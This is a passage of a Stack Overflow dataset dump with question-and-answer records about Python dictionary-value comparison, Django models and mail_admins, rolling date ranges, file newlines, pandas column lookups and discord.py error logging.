Dataset schema:
- content: string (lengths 85 to 101k)
- title: string (lengths 0 to 150)
- question: string (lengths 15 to 48k)
- answers: list
- answers_scores: list
- non_answers: list
- non_answers_scores: list
- tags: list
- name: string (lengths 35 to 137)
Q: how to compare values of two dictionaries with list comprehension? How to compare only the values of two dictionaries? So I have this: dict1 = {"appe": 3962.00, "waspeen": 3304.08} dic2 = {"appel": 3962.00, "waspeen": 3304.08} def compare_value_dict(dic): return dic def compare_value_dict2(dic2): return dic2 def compare_dic(dic1, dic2): if dic1 == dic2: print('the same dictionary') else: print('difference dictionary') compare_dic(compare_value_dict(dict1).values(), compare_value_dict2(dic2.values())) but I get the print statement: print('difference dictionary') But the values are the same. And can this be shorter with a list comprehension? This works: compare_dic(compare_value_dict(dict1).keys(), compare_value_dict2(dic2.keys())) If I change only a key, it reports the difference. But with values it doesn't work: if the values are the same but the keys are different, it still reports a difference, when of course it should not. A: You can't use == on the dict.values() dictionary view objects, as that specific type doesn't act like a set. Instead values_view_foo == values_view_bar is only ever true if both refer to the same dictionary view object. The contents don't matter. Which techniques can be used here depends entirely on the types of values the dictionaries contain. The following options will cover many different types of values, but not all. It is not really possible to make a generic one-size-fits-all comparison function for all possible types of values in a dictionary. In this specific case, you can turn your values views into sets, because the values happen to both be unique and hashable: def compare_dict_values(dv1, dv2): """Compare two dictionary values views Values are assumed to be unique and hashable """ return set(dv1) == set(dv2) Where the values are not unique, and / or not hashable, you'll have to find another way to compare the values. If they are, say, sortable (orderable), then you could compare them by first sorting the values: def compare_dict_values(dv1, dv2): """Compare two dictionary value views Values are assumed to be orderable, but do not need to be unique or hashable. """ return len(dv1) == len(dv2) and sorted(dv1) == sorted(dv2) By sorting you remove the issue with the values view being unordered. The len() check is there because it is much cheaper than sorting and so lets you avoid the sort when it is not necessary. If the values are hashable but not unique (and so the values collection ('foo', 'bar', 'foo') is different from ('foo', 'bar', 'bar')), you can use Counter() objects to capture both the values and their counts: from collections import Counter def compare_dict_values(dv1, dv2): """Compare two dictionary value views Values are assumed to be hashable, but do not need to be unique. """ return Counter(dv1) == Counter(dv2) Note: Each of these techniques assumes that the individual values in the dictionary support equality testing and you only need them to be exactly equal. For floating point values, you can run into issues where the values are almost equal, but not exactly equal. If your values need to be close and not just exactly equal, you can use the math.isclose() function on each pair of values. Use zip(sorted(dv1), sorted(dv2)) to pair up the values: import math def float_dict_values_close(dv1, dv2, **kwargs): """Compare two dictionary view objects with floats Returns true if the values in both dictionary views are *close* in value. """ if len(dv1) != len(dv2): return False v1, v2 = sorted(dv1), sorted(dv2) return all(math.isclose(*vs, **kwargs) for vs in zip(v1, v2)) Things get more complicated if your values can be different types; you generally can't sort a dictionary values view with a mix of different types in it. If you have a mix of types where not all the types are hashable, you'd have to separate out the different types first and then use a mixture of techniques to compare the values of the same type. This gets complicated when you have a hierarchy of types where subclasses can be compared with superclasses, etc. I'm declaring that as outside the scope of this answer. A: So you want to check whether your dictionaries have the same values, right? dict1 = {"appe": 3962.00, "waspeen": 3304.08} dic2 = {"appel": 3304.08, "waspeen": 3962.00} def comparison(*dicts): instanceToCompare, values = len(dicts[0].values()), set() for d in dicts: for value in d.values(): values.add(value) return len(values) == instanceToCompare print('all dictionaries have the same values') if comparison(dict1, dic2) else print('input dictionaries are not the same at all') You'll know whether all values in the dictionaries are the same, regardless of their order or repetition.
how to compare values of two dictionaries with list comprehension?
How to compare only the values of two dictionaries? So I have this: dict1 = {"appe": 3962.00, "waspeen": 3304.08} dic2 = {"appel": 3962.00, "waspeen": 3304.08} def compare_value_dict(dic): return dic def compare_value_dict2(dic2): return dic2 def compare_dic(dic1, dic2): if dic1 == dic2: print('the same dictionary') else: print('difference dictionary') compare_dic(compare_value_dict(dict1).values(), compare_value_dict2(dic2.values())) but I get the print statement: print('difference dictionary') But the values are the same. And can this be shorter with a list comprehension? This works: compare_dic(compare_value_dict(dict1).keys(), compare_value_dict2(dic2.keys())) If I change only a key, it reports the difference. But with values it doesn't work: if the values are the same but the keys are different, it still reports a difference, when of course it should not.
[ "You can't use == on the dict.values() dictionary view objects, as that specific type doesn't act like a set. Instead values_view_foo == values_view_bar is only ever true if both refer to the same dictionary view object. The contents don't matter.\nIt'll depend entirely on the types of values that the dictionary contains on what techniques can be used here. The following options will cover many different types of values, but not all. It is not really possible to make a generic one-size-fits-all comparison function for all possible types of values in a dictionary.\nIn this specific case, you can turn your values views into sets, because the values happen to both be unique and hashable:\ndef compare_dict_values(dv1, dv2):\n \"\"\"Compare two dictionary values views\n\n Values are assumed to be unique and hashable\n\n \"\"\"\n return set(dv1) == set(dv2)\n\nWhere the values are not unique, and / or not hashable, you'll have to find another way to compare the values.\nIf they are, say, sortable (orderable), then you could compare them by first sorting the values:\ndef compare_dict_values(dv1, dv2):\n \"\"\"Compare two dictionary value views\n\n Values are assumed to be orderable, but do not need to be unique\n or hashable.\n\n \"\"\"\n return len(dv1) == len(dv2) and sorted(dv1) == sorted(dv2)\n\nBy sorting you remove the issue with the values view being unordered. The len() check is there because it is much cheaper than sorting and so let’s you avoid the sort when it is not necessary.\nIf the values are hashable but not unique (and so the values collection ('foo', 'bar', 'foo') is different from ('foo', 'bar', 'bar')), you can use Counter() objects to capture both the values and their counts:\nfrom collections import Counter\n\ndef compare_dict_values(dv1, dv2):\n \"\"\"Compare two dictionary value views\n\n Values are assumed to be hashable, but do not need to be unique.\n\n \"\"\"\n return Counter(dv1) == Counter(dv2)\n\nNote: Each of these techniques assume that the individual values in the dictionary support equality testing and you only need them to be exactly equal. For floating point values, you can run into issues where the values are almost equal, but not exactly equal. If your values need to be close and not just exactly equal, you can use the math.isclose() function on each pair of values. Use zip(sorted(dv1), sorted(dv2)) to pair up the values:\ndef float_dict_values_close(dv1, dv2, **kwargs):\n \"\"\"Compare two dictionary view objects with floats\n\n Returns true if the values in both dictionary views are\n *close* in value.\n\n \"\"\"\n if len(dv1) != len(dv2):\n return False\n v1, v2 = sorted(dv1), sorted(dv2)\n return all(is_close(*vs, **kwargs) for vs in zip(v1, v2))\n\nThings get more complicated if your values can be different types; you generally can't sort a dictionary values view with a mix of different types in it. If you have a mix of types where not all the types are hashable, you'd have to separate out the different types first and then use a mixture of techniques to compare the values of the same type. This gets complicated when you have a hierarchy of types where subclasses can be compared with superclasses, etc. 
I'm declaring that as outside the scope of this answer.\n", "so you wanna check if your dictionaries are same with their values right?\ndict1 = {\"appe\": 3962.00, \"waspeen\": 3304.08}\ndic2 = {\"appel\": 3304.08, \"waspeen\": 3962.00}\ndef comparision(*dicts):\n instanceToCompare , values = len(dicts[0].values()) , set()\n for d in dicts:\n for value in d.values():\n values.add(value)\n return True if len(values) == instanceToCompare else False\nprint('all dictionaries has same values') if comparision(dict1 , dic2) else \nprint('input dictionaries are not same at all')\n\nyou'll know if all values in dictionaries are same or not , regardless to their order or repitation\n" ]
[ 5, 0 ]
[ "you can go with the function dic.keys() that returns a vector containing all \"headers\" from your dictionary. And in the for loop, you can compare.\n" ]
[ -1 ]
[ "dictionary", "dictview", "python" ]
stackoverflow_0074591555_dictionary_dictview_python.txt
Q: How to add a custom field to all objects of a Django model I have a DB with companies and custom users, and I want to add custom fields for different companies. Example: a user has only NAME; if the company is "EXAMPLE": the user has only NAME and AGE; elif "VIN": the user has NAME, SIZE, AGE and WORK; else: only NAME. How do I add these custom fields and update them? Thanks, sorry for my English)) Company 1: name "+add field" company 2: -name -age "+add field" company 3: -name -age -size "+add field" I tried many-to-many, many-to-one and simple fields, but they don't work the way I want. I want many custom fields that I can edit for every user. A: You should have separate models that refer to the user model with a OneToOne key, like this: class Example(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE) name = models.CharField(max_length=30) age = models.IntegerField() class Vin(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE) name = models.CharField(max_length=30) age = models.IntegerField() size = models.IntegerField() work = models.CharField(max_length=30)
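A hedged usage sketch for the OneToOne pattern in the answer (assumes Django's built-in User model; the import path and field values are illustrative, not from the question):

    from django.contrib.auth.models import User
    from myapp.models import Vin  # hypothetical app path; adjust to your project

    user = User.objects.create_user(username="driver1")
    Vin.objects.create(user=user, name="Anna", age=30, size=42, work="nurse")

    # The default reverse accessor is the lowercased model name
    print(user.vin.work)  # "nurse"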
How to add a custom field to all objects of a Django model
I have a DB with companies and custom users, and I want to add custom fields for different companies. Example: a user has only NAME; if the company is "EXAMPLE": the user has only NAME and AGE; elif "VIN": the user has NAME, SIZE, AGE and WORK; else: only NAME. How do I add these custom fields and update them? Thanks, sorry for my English)) Company 1: name "+add field" company 2: -name -age "+add field" company 3: -name -age -size "+add field" I tried many-to-many, many-to-one and simple fields, but they don't work the way I want. I want many custom fields that I can edit for every user.
[ "you must have separated models that refers OneToOne key to user model like this:\nclass Example(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, )\n name = models.CharField(max_length=30)\n age= models.IntegerField()\n\nclass Vin(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, )\n name = models.CharField(max_length=30)\n age= models.IntegerField()\n size= models.IntegerField()\n work= models.CharField(max_length=30)\n\n" ]
[ 0 ]
[]
[]
[ "django", "django_models", "django_views", "python" ]
stackoverflow_0074591721_django_django_models_django_views_python.txt
Q: How Can we Loop Through a Range of Rolling Dates? I did some Googling and figured out how to generate all Friday dates in a year. # get all Fridays in a year from datetime import date, timedelta def allfridays(year): d = date(year, 1, 1) # January 1st d += timedelta(days = 8 - 2) # Friday while d.year == year: yield d d += timedelta(days = 7) for d in allfridays(2022): print(d) Result: 2022-01-07 2022-01-14 2022-01-21 etc. 2022-12-16 2022-12-23 2022-12-30 Now, I'm trying to figure out how to loop through a range of rolling dates, so like 2022-01-07 + 60 days, then 2022-01-14 + 60 days, then 2022-01-21 + 60 days. step #1: start = '2022-01-07' end = '2022-03-08' step #2: start = '2022-01-14' end = '2022-03-15' Ideally, I want to pass the start and end dates into another loop, which looks like this... price_data = [] for ticker in tickers: try: prices = wb.DataReader(ticker, start = start.strftime('%m/%d/%Y'), end = end.strftime('%m/%d/%Y'), data_source='yahoo')[['Adj Close']] price_data.append(prices.assign(ticker=ticker)[['ticker', 'Adj Close']]) except: print(ticker) df = pd.concat(price_data) A: First, we have to figure out how to get the first Friday of a given year. Next, we will calculate the start and end days. import datetime FRIDAY = 4 # Based on Monday=0 WEEK = datetime.timedelta(days=7) def first_friday(year): """Return the first Friday of the year.""" the_date = datetime.date(year, 1, 1) while the_date.weekday() != FRIDAY: the_date = the_date + datetime.timedelta(days=1) return the_date def friday_ranges(year, days_count): """ Generate date ranges that starts on first Friday of `year` and lasts for `days_count`. """ DURATION = datetime.timedelta(days=days_count) start_date = first_friday(year) end_date = start_date + DURATION while end_date.year == year: yield start_date, end_date start_date += WEEK end_date = start_date + DURATION for start_date, end_date in friday_ranges(year=2022, days_count=60): # Do what you want with start_date and end_date print((start_date, end_date)) Sample output: (datetime.date(2022, 1, 7), datetime.date(2022, 3, 8)) (datetime.date(2022, 1, 14), datetime.date(2022, 3, 15)) (datetime.date(2022, 1, 21), datetime.date(2022, 3, 22)) ... (datetime.date(2022, 10, 21), datetime.date(2022, 12, 20)) (datetime.date(2022, 10, 28), datetime.date(2022, 12, 27)) Notes The algorithm for the first Friday is simple: start with Jan 1, then keep advancing the day until Friday. I made the assumption that the end date must fall within the specified year. If that is not the case, you can adjust the condition in the while loop. A: Since you use pandas, you can try it this way: import pandas as pd year = 2022 dates = pd.date_range(start=f'{year}-01-01',end=f'{year}-12-31',freq='W-FRI') df = pd.DataFrame({'my_dates':dates, 'sixty_ahead':dates + pd.Timedelta(days=60)}) print(df.head()) ''' my_dates sixty_ahead 0 2022-01-07 2022-03-08 1 2022-01-14 2022-03-15 2 2022-01-21 2022-03-22 3 2022-01-28 2022-03-29 4 2022-02-04 2022-04-05 A: Maybe this could work. You can add the condition for the end of the loop within the lambda function. from datetime import date, timedelta def allfridays(year): d = date(year, 1, 1) # January 1st d += timedelta(days = 8 - 2) # Friday while d.year == year: yield d d += timedelta(days = 7) list_dates = [] for d in allfridays(2022): list_dates.append(d) add_days = map(lambda x: x+timedelta(days = 60),list_dates) print(list(add_days)) A: Oh my, I totally missed this before. The solution below works just fine. import pandas as pd # get all Fridays in a year from datetime import date, timedelta def allfridays(year): d = date(year, 1, 1) # January 1st d += timedelta(days = 8 - 2) # Friday while d.year == year: yield d d += timedelta(days = 7) lst=[] for d in allfridays(2022): lst.append(d) df = pd.DataFrame(lst) print(type(df)) df.columns = ['my_dates'] df['sixty_ahead'] = df['my_dates'] + timedelta(days=60) df Result: my_dates sixty_ahead 0 2022-01-07 2022-03-08 1 2022-01-14 2022-03-15 2 2022-01-21 2022-03-22 etc. 49 2022-12-16 2023-02-14 50 2022-12-23 2023-02-21 51 2022-12-30 2023-02-28
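A sketch of feeding the rolling (start, end) pairs into the question's download loop (hedged: the offset mirrors the question's hard-coded start, which happens to land on a Friday in 2022, and the actual data fetch is left as a comment since the Yahoo endpoint may no longer respond):

    from datetime import date, timedelta

    def friday_windows(year, days_ahead=60):
        d = date(year, 1, 1) + timedelta(days=6)  # same offset as the question
        while d.year == year:
            yield d, d + timedelta(days=days_ahead)
            d += timedelta(days=7)

    for start, end in friday_windows(2022):
        # prices = wb.DataReader(ticker, start=start.strftime('%m/%d/%Y'),
        #                        end=end.strftime('%m/%d/%Y'), data_source='yahoo')
        print(start.strftime('%m/%d/%Y'), end.strftime('%m/%d/%Y'))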
How Can we Loop Through a Range of Rolling Dates?
I did some Googling and figured out how to generate all Friday dates in a year. # get all Fridays in a year from datetime import date, timedelta def allfridays(year): d = date(year, 1, 1) # January 1st d += timedelta(days = 8 - 2) # Friday while d.year == year: yield d d += timedelta(days = 7) for d in allfridays(2022): print(d) Result: 2022-01-07 2022-01-14 2022-01-21 etc. 2022-12-16 2022-12-23 2022-12-30 Now, I'm trying to figure out how to loop through a range of rolling dates, so like 2022-01-07 + 60 days, then 2022-01-14 + 60 days, then 2022-01-21 + 60 days. step #1: start = '2022-01-07' end = '2022-03-08' step #2: start = '2022-01-14' end = '2022-03-15' Ideally, I want to pass the start and end dates into another loop, which looks like this... price_data = [] for ticker in tickers: try: prices = wb.DataReader(ticker, start = start.strftime('%m/%d/%Y'), end = end.strftime('%m/%d/%Y'), data_source='yahoo')[['Adj Close']] price_data.append(prices.assign(ticker=ticker)[['ticker', 'Adj Close']]) except: print(ticker) df = pd.concat(price_data)
[ "First, we have to figure out how to get the first Friday of a given year. Next, we will calculate the start, end days.\nimport datetime\n\nFRIDAY = 4 # Based on Monday=0\nWEEK = datetime.timedelta(days=7)\n\n\ndef first_friday(year):\n \"\"\"Return the first Friday of the year.\"\"\"\n the_date = datetime.date(year, 1, 1)\n while the_date.weekday() != FRIDAY:\n the_date = the_date + datetime.timedelta(days=1)\n return the_date\n\n\ndef friday_ranges(year, days_count):\n \"\"\"\n Generate date ranges that starts on first Friday of `year` and\n lasts for `days_count`.\n \"\"\"\n DURATION = datetime.timedelta(days=days_count)\n\n start_date = first_friday(year)\n end_date = start_date + DURATION\n\n while end_date.year == year:\n yield start_date, end_date\n start_date += WEEK\n end_date = start_date + DURATION\n\n\nfor start_date, end_date in friday_ranges(year=2022, days_count=60):\n # Do what you want with start_date and end_date\n print((start_date, end_date))\n\nSample output:\n(datetime.date(2022, 1, 7), datetime.date(2022, 3, 8))\n(datetime.date(2022, 1, 14), datetime.date(2022, 3, 15))\n(datetime.date(2022, 1, 21), datetime.date(2022, 3, 22))\n...\n(datetime.date(2022, 10, 21), datetime.date(2022, 12, 20))\n(datetime.date(2022, 10, 28), datetime.date(2022, 12, 27))\n\nNotes\n\nThe algorithm for first Friday is simple: Start with Jan 1, then keep advancing the day until Friday\nI made an assumption that the end date must fall into the specified year. If that is not the case, you can adjust the condition in the while loop\n\n", "as you use pandas then you can try to do it this way:\nimport pandas as pd\n\nyear = 2022\ndates = pd.date_range(start=f'{year}-01-01',end=f'{year}-12-31',freq='W-FRI')\ndf = pd.DataFrame({'my_dates':dates, 'sixty_ahead':dates + pd.Timedelta(days=60)})\n\nprint(df.head())\n'''\n my_dates sixty_ahead\n0 2022-01-07 2022-03-08\n1 2022-01-14 2022-03-15\n2 2022-01-21 2022-03-22\n3 2022-01-28 2022-03-29\n4 2022-02-04 2022-04-05\n\n", "This could work maybe. You can add the condition, the end of the loop within the lambda function.\nfrom datetime import date, timedelta\n def allfridays(year):\n d = date(year, 1, 1) # January 1st \n d += timedelta(days = 8 - 2) # Friday \n while d.year == year:\n yield d\n d += timedelta(days = 7) \n list_dates = []\n for d in allfridays(2022):\n list_dates.append(d)\n \n\n add_days = map(lambda x: x+timedelta(days = 60),list_dates)\n print(list(add_days))\n\n", "Oh my, I totally missed this before. The solution below works just fine.\nimport pandas as pd\n# get all Fridays in a year\nfrom datetime import date, timedelta\ndef allfridays(year):\n d = date(year, 1, 1) # January 1st \n d += timedelta(days = 8 - 2) # Friday \n while d.year == year:\n yield d\n d += timedelta(days = 7)\n\nlst=[]\nfor d in allfridays(2022):\n lst.append(d)\n \ndf = pd.DataFrame(lst)\nprint(type(df))\ndf.columns = ['my_dates']\n\n\ndf['sixty_ahead'] = df['my_dates'] + timedelta(days=60)\ndf \n\nResult:\n my_dates sixty_ahead\n0 2022-01-07 2022-03-08\n1 2022-01-14 2022-03-15\n2 2022-01-21 2022-03-22\netc.\n49 2022-12-16 2023-02-14\n50 2022-12-23 2023-02-21\n51 2022-12-30 2023-02-28\n\n" ]
[ 1, 1, 0, 0 ]
[]
[]
[ "python", "python_3.x" ]
stackoverflow_0074586200_python_python_3.x.txt
Q: write('\n') command does not insert a new line I am working on a converter file in Colab Python. When creating the txt file, at specific places I need it to write the 0 and start a new line, but it does not. Please help; here is my code: f=open('dimac_outfs1.txt') with open('dimac_outfs1.txt','a') as writefile: for i in range(len(my_array)): if my_array[i]!=0: writefile.write(str(my_array[i])) else: writefile.write(str(str(my_array[i] + '\n')) even trying else: writefile.write(str(my_array[i])) writefile.write("\n") does not help. my_array is a numpy.ndarray which consists of: array(['-1', ' ', '-2', ..., ' ', '0', ' '], dtype='<U21') It has positive and negative integers as well as zeros and spaces. A: If I understand this correctly, your command does not work. I think if you check the debugger you will notice that there is an EOL error in: else: writefile.write(str(str(my_array[i] + '\n')) You are missing a parenthesis. Otherwise, with open(<file>,'a') as f: f.write(str(i)+'\n') works, so I guess the EOL error is the culprit. Also, tips that lazy me loves: I recommend putting a '\n' at the beginning of your code if you append to a file. Make sure you are in the right path, and if needed, use the absolute path of the file you append to. Python being very good at simplifying everything, you can also write your for loop this way: for elem in list: elem will be list[0], list[1] etc. on each iteration. Hoping I answered your question
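For reference, a balanced version of the question's loop (a minimal sketch assuming my_array from the question; note that the array holds strings, dtype '<U21', so my_array[i] != 0 is always true and the else branch never runs — compare against '0' instead):

    with open('dimac_outfs1.txt', 'a') as writefile:
        for item in my_array:
            if item != '0':  # string comparison, since the array holds strings
                writefile.write(str(item))
            else:
                writefile.write(str(item) + '\n')  # parentheses now balanced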
write('\n') command does not insert a new line
I am working on a converter file in Colab Python. When creating the txt file, at specific places I need it to write the 0 and start a new line, but it does not. Please help; here is my code: f=open('dimac_outfs1.txt') with open('dimac_outfs1.txt','a') as writefile: for i in range(len(my_array)): if my_array[i]!=0: writefile.write(str(my_array[i])) else: writefile.write(str(str(my_array[i] + '\n')) even trying else: writefile.write(str(my_array[i])) writefile.write("\n") does not help. my_array is a numpy.ndarray which consists of: array(['-1', ' ', '-2', ..., ' ', '0', ' '], dtype='<U21') It has positive and negative integers as well as zeros and spaces.
[ "If I understand this correctly, you command does not work.\nI think if you check the debugger you will notice that there is an EOL error in :\n else:\n writefile.write(str(str(my_array[i] + '\\n')) \n\nYou are missing a parenthesis.\nOtherwise, the\nwith open(<file>,'a') as f:\nf.write(str(i)+'\\n')\n\nworks so I guess the EOL error should be the one.\nAlso tips that lazy me loves :\nI can recommand you to put a '\\n' at the beginning of your code if you append to file.\nMake sure you are in the right path, and if needed, put the absolute path of the file you append to.\nPython being very good to simplify everything, you can also use your for loop this way :\nfor elem in list :\n\nelem will at each loop be list[0], list[1] etc.\nHoping I answered your question \n" ]
[ 1 ]
[]
[]
[ "arrays", "file", "python" ]
stackoverflow_0074591656_arrays_file_python.txt
Q: Django mail_admins not sending an email I have tried using send_mail and it works properly (its HTML shows the value '1'), but when I access localhost:8000/emailAdmins it shows the word 'None' in the HTML. Please help me figure out why mail_admins doesn't work. My settings EMAIL_HOST='smtp.gmail.com' EMAIL_HOST_USER='myemail@gmail.com' EMAIL_HOST_PASSWORD='password' EMAIL_PORT=587 EMAIL_USE_TLS=True ADMINS = [ ('myname' , 'myemail@gmail.com'), ] My url from django.conf.urls import url from app1 import views as myapp urlpatterns = [ url(r'^emailAdmins/',myapp.sendAdminsEmail,name='emailAdmins'), ] My view from django.http import HttpResponse from django.core.mail import mail_admins def sendAdminsEmail(request): res = mail_admins('my subject', 'site is going down',) return HttpResponse('%s' %res) A: Add this line to your email configuration; it worked for me: EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
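A consolidated sketch of the working configuration (credentials are placeholders). Note that mail_admins() returns None, which is why the response body showed 'None' — build the success message yourself:

    # settings.py
    EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
    EMAIL_HOST = 'smtp.gmail.com'
    EMAIL_PORT = 587
    EMAIL_USE_TLS = True
    EMAIL_HOST_USER = 'myemail@gmail.com'
    EMAIL_HOST_PASSWORD = 'password'
    ADMINS = [('myname', 'myemail@gmail.com')]

    # views.py
    from django.core.mail import mail_admins
    from django.http import HttpResponse

    def sendAdminsEmail(request):
        mail_admins('my subject', 'site is going down')  # returns None
        return HttpResponse('mail sent to admins')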
Django mail_admins not sending an email
I have tried using send_mail and it works properly (its HTML shows the value '1'), but when I access localhost:8000/emailAdmins it shows the word 'None' in the HTML. Please help me figure out why mail_admins doesn't work. My settings EMAIL_HOST='smtp.gmail.com' EMAIL_HOST_USER='myemail@gmail.com' EMAIL_HOST_PASSWORD='password' EMAIL_PORT=587 EMAIL_USE_TLS=True ADMINS = [ ('myname' , 'myemail@gmail.com'), ] My url from django.conf.urls import url from app1 import views as myapp urlpatterns = [ url(r'^emailAdmins/',myapp.sendAdminsEmail,name='emailAdmins'), ] My view from django.http import HttpResponse from django.core.mail import mail_admins def sendAdminsEmail(request): res = mail_admins('my subject', 'site is going down',) return HttpResponse('%s' %res)
[ "Add this line with your email configuration it worked for me\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n\n" ]
[ 0 ]
[]
[]
[ "django", "python" ]
stackoverflow_0055015391_django_python.txt
Q: How to compare variables in different columns in pandas I want to compare three variables in three dataframe columns, but I get an error: TypeError: unhashable type: 'Series'. Below is my code: import pandas as pd df = pd.DataFrame(columns=['Entry','Middle','Exit']) entry_value = '17.98' middle_value = '12.16' exit_value = '1.2' df = df.append({'Entry' : entry_value , 'Middle' : middle_value, 'Exit' : exit_value}, ignore_index = True) entry_value = '19.98' middle_value = '192.16' exit_value = '1.1' if entry_value in {df['Entry'] , df['Middle'] , df['Exit']} : print('entry') elif middle_value in {df['Entry'] , df['Middle'] , df['Exit']} : print('middle') elif exit_value in {df['Entry'] , df['Middle'] , df['Exit']} : print('exit') else: print('wawo') A: You can search a single column directly, but if you want to search multiple columns you must either convert them to a single list or combine them into a single Series. if entry_value in df[['Entry','Middle','Exit']].stack().to_list(): print('entry') elif middle_value in df[['Entry','Middle','Exit']].stack().to_list(): print('middle') elif exit_value in df[['Entry','Middle','Exit']].stack().to_list(): print('exit') else: print('wawo') If you are searching all columns, you do not need to define individual column names: #dont use #df[['Entry','Middle','Exit']].stack() #use #df.stack() if entry_value in df.stack().to_list(): print('entry') elif middle_value in df.stack().to_list(): print('middle') elif exit_value in df.stack().to_list(): print('exit') else: print('wawo') A: I suggest using pandas.DataFrame.isin to check whether any of the selected columns contain a certain value. Try this: cols = ['Entry', 'Middle', 'Exit'] if df[cols].isin([entry_value]).any().any(): print('entry') elif df[cols].isin([middle_value]).any().any(): print('middle') elif df[cols].isin([exit_value]).any().any(): print('exit') else: print('wawo') NB: Not sure why you're assigning different values to the same variables when constructing your dataframe, but you should know that pandas.DataFrame.append is deprecated. FutureWarning: The frame.append method is deprecated and will be removed from pandas in a future version. Use pandas.concat instead.
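An end-to-end check of the stack-based lookup (a sketch; pd.concat replaces the deprecated DataFrame.append):

    import pandas as pd

    df = pd.DataFrame(columns=['Entry', 'Middle', 'Exit'])
    row = pd.DataFrame([{'Entry': '17.98', 'Middle': '12.16', 'Exit': '1.2'}])
    df = pd.concat([df, row], ignore_index=True)

    values = df.stack().to_list()  # ['17.98', '12.16', '1.2']
    print('17.98' in values)  # True
    print('19.98' in values)  # False -> falls through to 'wawo'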
How to compare variables in different columns in pandas
I want to compare three variables in three dataframe columns, but I get an error: TypeError: unhashable type: 'Series'. Below is my code: import pandas as pd df = pd.DataFrame(columns=['Entry','Middle','Exit']) entry_value = '17.98' middle_value = '12.16' exit_value = '1.2' df = df.append({'Entry' : entry_value , 'Middle' : middle_value, 'Exit' : exit_value}, ignore_index = True) entry_value = '19.98' middle_value = '192.16' exit_value = '1.1' if entry_value in {df['Entry'] , df['Middle'] , df['Exit']} : print('entry') elif middle_value in {df['Entry'] , df['Middle'] , df['Exit']} : print('middle') elif exit_value in {df['Entry'] , df['Middle'] , df['Exit']} : print('exit') else: print('wawo')
[ "You can search for a column but if you want to search for multiple columns you must either convert them to a single list or define them as a single series.\nif entry_value in df[['Entry','Middle','Exit']].stack().to_list():\n print('entry')\nelif middle_value in df[['Entry','Middle','Exit']].stack().to_list():\n print('middle')\nelif exit_value in df[['Entry','Middle','Exit']].stack().to_list():\n print('exit')\nelse:\n print('wawo')\n\nIf you are searching all columns, you do not need to define individual column names:\n#dont use\n#df[['Entry','Middle','Exit']].stack()\n\n#use\n#df.stack()\nif entry_value in df.stack().to_list():\n print('entry')\nelif middle_value in df.stack().to_list():\n print('middle')\nelif exit_value in df.stack().to_list():\n print('exit')\nelse:\n print('wawo')\n\n", "I suggest you to use pandas.DataFrame.isin to check if any of the columns selected contain a certain value.\nTry this :\ncols= ['Entry', 'Middle', 'Exit']\n\nif any(df[cols].isin([entry_value])):\n print('entry')\nelif any(df[cols].isin([middle_value])):\n print('middle')\nelif any(df[cols].isin([exit_value])):\n print('exit')\nelse:\n print('wawo')\n\nNB: Not sure why you're assigning different values to the same variables when constructing your datarame but you should know that pandas.DataFrame.append is deprecated.\n\nFutureWarning: The frame.append method is deprecated and will be\nremoved from pandas in a future version. Use pandas.concat instead.\n\n" ]
[ 0, 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074591879_dataframe_pandas_python.txt
Q: Runtime error not showing when using asyncio to run discord bot I'm developing a Discord bot with discord.py==2.1.0. I use a cog to write the main functions I want, but I found that when the whole bot is wrapped in an async function and called by asyncio.run(), my terminal won't show any error message when there is a runtime error in my cog script. Here is the example application. I stored my bot token in an environment variable. bot.py import os import discord from discord.ext import commands import asyncio token = os.environ["BOT_TOKEN"] class Bot(commands.Bot): def __init__(self): intents = discord.Intents.default() intents.members = True intents.message_content = True description = "bot example." super().__init__( command_prefix=commands.when_mentioned_or('!'), intents=intents, description=description ) async def on_ready(self): print(f'Logged in as {self.user} (ID: {self.user.id})') print('------') bot = Bot() async def load_extensions(): for f in os.listdir("./cogs"): if f.endswith(".py"): await bot.load_extension("cogs." + f[:-3]) async def main(): async with bot: await load_extensions() await bot.start(token) asyncio.run(main()) ./cogs/my_cog.py from discord.ext import commands class Test(commands.Cog): def __init__(self, client): self.client = client @commands.Cog.listener() async def on_ready(self): print("Ready") @commands.command() async def command(self, ctx): test_error_message() # A runtime error example print("Command") async def setup(client): await client.add_cog(Test(client)) Command that I run in the terminal to start the bot: python bot.py When I type !command in the Discord channel, no error message shows in the terminal, but "Command" is not printed out either, so I'm sure the code stopped at the line where I called test_error_message(). I expected it to show the error message normally, but I cannot find a useful reference to make it work :( There is one reason I need to use asyncio: I have a task loop to run in the bot, like the code below. from discord.ext import tasks @tasks.loop(seconds=10) async def avatar_update(): # code here async def main(): async with bot: avatar_update.start() await load_extensions() await bot.start(token) I would be happy to know if there are good practices for handling errors in this situation. Thanks! A: Client.start() doesn't configure logging, so if you want to use that then you have to do it yourself (there's setup_logging to add a basic config). run() configures logging for you. For more info, read the docs. https://discordpy.readthedocs.io/en/stable/logging.html?highlight=logging
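A sketch of the fix in the question's own main() (hedged: discord.utils.setup_logging() was added in discord.py 2.0, which matches the 2.1.0 pin above; bot, token and load_extensions are the names from the question):

    import asyncio
    import discord

    async def main():
        discord.utils.setup_logging()  # what bot.run() would otherwise do for you
        async with bot:
            await load_extensions()
            await bot.start(token)

    asyncio.run(main())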
Runtime error not showing when using asyncio to run discord bot
I'm developing discord bot with discord.py==2.1.0. I use cog to write the main function that I wanna use, but I found when the whole bot is wrapped in async function and called by asyncio.run(), my terminal won't show any error message when there is any runtime error in my cog script. Here is the example application. I stored my bot token in environment variable. bot.py import os import discord from discord.ext import commands import asyncio token = os.environ["BOT_TOKEN"] class Bot(commands.Bot): def __init__(self): intents = discord.Intents.default() intents.members = True intents.message_content = True description = "bot example." super().__init__( command_prefix=commands.when_mentioned_or('!'), intents=intents, description=description ) async def on_ready(self): print(f'Logged in as {self.user} (ID: {self.user.id})') print('------') bot = Bot() async def load_extensions(): for f in os.listdir("./cogs"): if f.endswith(".py"): await bot.load_extension("cogs." + f[:-3]) async def main(): async with bot: await load_extensions() await bot.start(token) asyncio.run(main()) ./cogs/my_cog.py from discord.ext import commands class Test(commands.Cog): def __init__(self, client): self.client = client @commands.Cog.listener() async def on_ready(self): print("Ready") @commands.command() async def command(self, ctx): test_error_message() # An 